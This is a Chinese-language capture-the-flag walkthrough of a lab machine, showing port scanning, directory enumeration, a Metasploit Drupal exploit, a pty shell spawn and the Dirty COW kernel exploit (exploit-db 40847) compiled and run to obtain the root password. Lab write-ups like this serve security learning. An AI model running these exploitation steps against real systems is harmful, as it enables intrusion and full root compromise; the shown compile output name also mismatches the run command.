还是扫描同网段的靶机,扫描开放端口
明显192.168.52.135是,扫面下端口,开放了80和22
第二次扫描出来1898端口
访问下1898端口
dirb http://192.168.52.135:1898,敏感目录很多
(这里也可以使用dirsearch等扫描软件)
通过泄露的信息,找到了apache的版本号和操作系统等指纹信息。
根据信息百度搜索发现Drupal的漏洞,打开msf框架
msfconsole//打开msf
search 名称 //找漏洞
use 漏洞名称或者编号//使用
show options //配置参数
run //启动
看看需要配置那些参数,
配置下攻击ip就可以了,
set rhosts 192.168.52.135
set rport 1898
Run就可以了
这里存在脏牛漏洞,
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。
漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)
简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条件(race condition)。恶意用户可利用此漏洞,来获取高权限,对只读内存映射进行写访问。竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限。
这个藏牛漏洞在msf没有现成的exp,所以需要去exploitdb上找。或者直接在kali上输入,这里使用40847.cpp,其他的可能会使靶机崩溃。
新打开一个命令行窗口
searchsploit dirty
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp //将文件传上靶机
提权
先进入自带的shell模块,然后利用python的pty模块获得一个shell,然后进入数据库
python -c "import pty;pty.spawn('/bin/bash')"
在tmp目录下对40847.cpp文件进行编译:
g++ -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
运行:
./dcow -s
获得root密码
dirtyCowFun
利用ssh登录
ssh root@192.168.52.135
随便打的回显是这样的不知道为什么
登上去找到flag打开就行